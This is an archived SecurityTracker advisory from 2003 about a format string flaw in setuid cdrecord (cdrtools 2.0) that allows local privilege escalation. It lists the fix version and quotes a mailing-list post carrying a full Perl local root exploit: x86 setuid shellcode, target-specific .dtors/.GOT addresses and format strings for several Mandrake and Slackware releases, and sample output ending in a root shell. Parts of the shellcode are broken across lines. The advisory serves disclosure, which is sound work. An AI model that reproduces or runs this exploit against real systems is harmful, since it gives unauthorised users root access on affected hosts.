SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   cdrtools Vendors:   Schilling, J.
(Exploit is Available) Re: 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1006752
SecurityTracker URL:  http://securitytracker.com/id/1006752
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 14 2003
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): 2.0
Description:   A format string vulnerability was reported in 'cdrecord' in the 'cdrtools' package. A local user can gain elevated privileges on the system, including root privileges on some distributions.

It is reported that libscg/scsiopen.c contains a format string flaw in line 273, where a js_snprintf() function is called with a proper formatting string. A local user can set the 'dev' argument to a specially crafted value to trigger the flaw and potentially execute arbitrary code. The privileges that the code will run with depend on the package distribution. According to the report, the package is configured with set user id (setuid) root user privileges on some distributions.

Some exploit code is available in the Source Message.

Impact:   A local user can execute arbitrary code with elevated privileges on the system. The specific privileges depend on the settings of the particular distribution. Some distributions of the application permit the local user to obtain root privileges.
Solution:   The vendor has released a fixed alpha version (2.01a14), available at:

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

Vendor URL:  www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 14 2003 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges



 Source Message Contents

Subject:  =?iso-8859-1?Q?Cdrecord_local_root_exploit.?=


Priv8security.com 

Hi, here it is local root exploit cdrecord format string bug
 Cdrecord come suid root by default on mandrake distro and it can be
executed by anybody.

[wsxz@localhost wsxz]$ ls -l /usr/bin/cdrecord
-rwsr-sr-x    1 root     cdwriter   278156 Jan  6 07:2 /usr/bin/cdrecord*

here goes the code or get it on
http://releases.priv8security.org/priv8cdr.pl

priv8cdr.pl
--------cut here------------------------------------------------------

#!/usr/bin/perl
###########################################################
#Priv8security.com Cdrecord version 2.0 and < local root exploit.
#
#     Version 1.10 is NOT VULN!!!!
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002
#                                 
#                                 
#   scsibus: -1 target: -1 lun: -1
#   Warning: Open by 'devname' is unintentional and not supported.
#   /usr/bin/cdrecord: No such file or directory. Cannot open '.
Cannot open SCSI driver.
#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'.
Make sure you are root.
#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord
dev=help'.
#   sh-2.05b# id
#   uid=0(root) gid=0(root) groups=503(wsxz)
#   sh-2.05b#
#####################################################

                    $shellcode =
                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
                    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
                    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
89\xd8\x40\xcd\x80\xe8\xdc\xff".
                    "\xff\xff/bin/sh";

                    $cdrecordpath = "/usr/bin/cdrecord";
                    $nop = "\x90"; # x86 NOP
                    $offset = 0; # Default offset to try.


     if (@ARGV == 1 || @ARGV == 2) {
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
                    }else{
                    printf(" Priv8security.com Cdrecord local root
exploit!!\n");
                    printf(" usage: $0 target\n");
                    printf(" List of targets:\n");
                    printf("      1 - Linux Mandrake 8.2 Cdrecord
1.11a15\n");
                    printf("      2 - Linux Mandrake 9.0 Cdrecord
1.11a32\n");
                    printf("      3 - Linux Slackware 8.1 Cdrecord
1.11a24 not suid by default!!!\n");
                    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
                    exit(1);
                    }

     if ( $target eq "1" ) {
                   $retword = 0x0807af38; #Mr  .dtors ;)
                   $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
                    }
     if ( $target eq "2" ) {
                  # $retword = 0x08084578; #.dtors
                   $retword = 0x08084684; #.GOT exit
                   $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
                    }
      if ( $target eq "3" ) {
                   $retword = 0x0807f658;
                   $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
                    }
       if ( $target eq "4" ) {
                   $retword = 0x0808c82c; #.GOT exit
                   $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
                    }

                    printf("Using target number %d\n", $target);
                    printf("Using Mr .dtors 0x%x\n",$retword);

                    $new_retword = pack('l', ($retword));
                    $new_retshell = pack('l', ($retshell));
                    $buffer2 = $new_retword;
                  
 $buffer2 .= $shellcode;
                    $buffer2 .= $fmtstring;

                    exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");

--------cut here-----------------------------------------------


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC